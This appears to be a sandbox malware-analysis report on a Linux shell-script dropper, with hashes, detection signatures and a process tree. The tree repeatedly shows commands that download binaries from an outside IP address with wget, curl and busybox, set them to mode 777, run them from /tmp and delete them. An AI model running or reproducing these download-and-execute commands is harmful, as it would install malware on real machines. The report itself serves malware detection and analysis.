Analysis
-
max time kernel
39s -
max time network
49s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/10/2024, 01:20
Static task
static1
Behavioral task
behavioral1
Sample
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
-
Size
10KB
-
MD5
f79898139a1b167722dc600e9d8751bd
-
SHA1
c722cddfe77235ab1217ff62e01181953ff08a24
-
SHA256
632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e
-
SHA512
99640786d2cad89e6932b07b8415be47959e635c05d46f6a9296711a1ba314dac17263a2d108e0af8a7ac270981f81c2065ac6f5cf718e3e5b9cff0d96e70137
-
SSDEEP
192:w/fwLnbwfOiNa6QAP8AnDlksBw8S8AnkksBw8t/fwLnAOiNa6I:zwOAP8AnDlksBw8S8AnkksBw8q
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 16 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 813 chmod 683 chmod 737 chmod 775 chmod 801 chmod 807 chmod 839 chmod 694 chmod 712 chmod 827 chmod 850 chmod 856 chmod 756 chmod 821 chmod 833 chmod 862 chmod -
Executes dropped EXE 16 IoCs
ioc pid Process /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE 684 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ 695 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K 713 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 739 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce 758 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl 776 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ 802 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 808 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa 814 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI 822 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 828 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr 834 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs 840 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 851 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 857 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa 863 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa -
Checks CPU configuration 1 TTPs 16 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 16 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ curl File opened for modification /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl curl File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr curl File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 curl File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI curl File opened for modification /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 curl File opened for modification /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 curl File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 curl File opened for modification /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce curl File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa curl File opened for modification /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE curl File opened for modification /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K curl File opened for modification /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 curl File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ curl File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa curl File opened for modification /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs curl
Processes
-
/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh1⤵PID:657
-
/bin/rm/bin/rm bins.sh2⤵PID:659
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:665
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:672
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:680
-
-
/bin/chmodchmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- File and Directory Permissions Modification
PID:683
-
-
/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Executes dropped EXE
PID:684
-
-
/bin/rmrm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:686
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:687
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:691
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:693
-
-
/bin/chmodchmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- File and Directory Permissions Modification
PID:694
-
-
/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Executes dropped EXE
PID:695
-
-
/bin/rmrm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:696
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:697
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:704
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:709
-
-
/bin/chmodchmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- File and Directory Permissions Modification
PID:712
-
-
/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Executes dropped EXE
PID:713
-
-
/bin/rmrm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:714
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:715
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:729
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:733
-
-
/bin/chmodchmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:740
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:741
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:752
-
-
/bin/chmodchmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Executes dropped EXE
PID:758
-
-
/bin/rmrm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:759
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:761
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:763
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:772
-
-
/bin/chmodchmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Executes dropped EXE
PID:776
-
-
/bin/rmrm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:778
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:779
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:787
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:800
-
-
/bin/chmodchmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:803
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:804
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:806
-
-
/bin/chmodchmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:809
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:810
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:812
-
-
/bin/chmodchmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:815
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:816
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:820
-
-
/bin/chmodchmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:823
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:824
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:826
-
-
/bin/chmodchmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:829
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:830
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:832
-
-
/bin/chmodchmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Executes dropped EXE
PID:834
-
-
/bin/rmrm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:835
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:836
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:838
-
-
/bin/chmodchmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:841
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:845
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:847
-
-
/bin/chmodchmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Executes dropped EXE
PID:851
-
-
/bin/rmrm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:852
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:853
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:855
-
-
/bin/chmodchmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:858
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:859
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:861
-
-
/bin/chmodchmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:864
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:865
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97